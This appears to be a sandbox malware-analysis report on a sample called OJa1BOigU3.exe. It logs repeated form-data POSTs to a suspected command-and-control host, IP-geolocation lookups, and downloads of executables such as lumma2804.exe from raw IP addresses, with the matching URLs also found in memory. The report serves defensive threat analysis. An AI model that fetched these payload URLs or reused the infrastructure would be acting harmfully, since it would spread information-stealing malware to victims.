Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1352Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587207Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1325Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587264Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1285Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 593152Host: miniaturefinerninewjs.shop
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: HEAD /download/th/Retailer_prog.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/Retailer_prog.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /retailerTest.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /retailerTest.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.226

Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/84.17.40.101 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=84.17.40.101 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /download/th/Retailer_prog.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /retailerTest.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: miniaturefinerninewjs.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miniaturefinerninewjs.shop

Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E29000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exed
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exelF
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exepData
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exesepro4
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/retailerTest.exe
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/retailerTest.exe53/lumma2804.exe
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/retailerTest.exeent
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/retailerTest.exeq
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.000000000157A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/Retailer_prog.exe
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.000000000157A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/Retailer_prog.exer
Source: OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, U8cABsPhZFkKRrQ4rE0N.exe.0.dr, MSIUpdaterV1.exe1.0.dr, retailerTest[1].exe.0.dr, lumma2804[1].exe.0.dr, MSIUpdaterV1.exe0.0.dr, v6ggwc2fJXXgIu5fzDQ2.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, U8cABsPhZFkKRrQ4rE0N.exe.0.dr, MSIUpdaterV1.exe1.0.dr, retailerTest[1].exe.0.dr, lumma2804[1].exe.0.dr, MSIUpdaterV1.exe0.0.dr, v6ggwc2fJXXgIu5fzDQ2.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
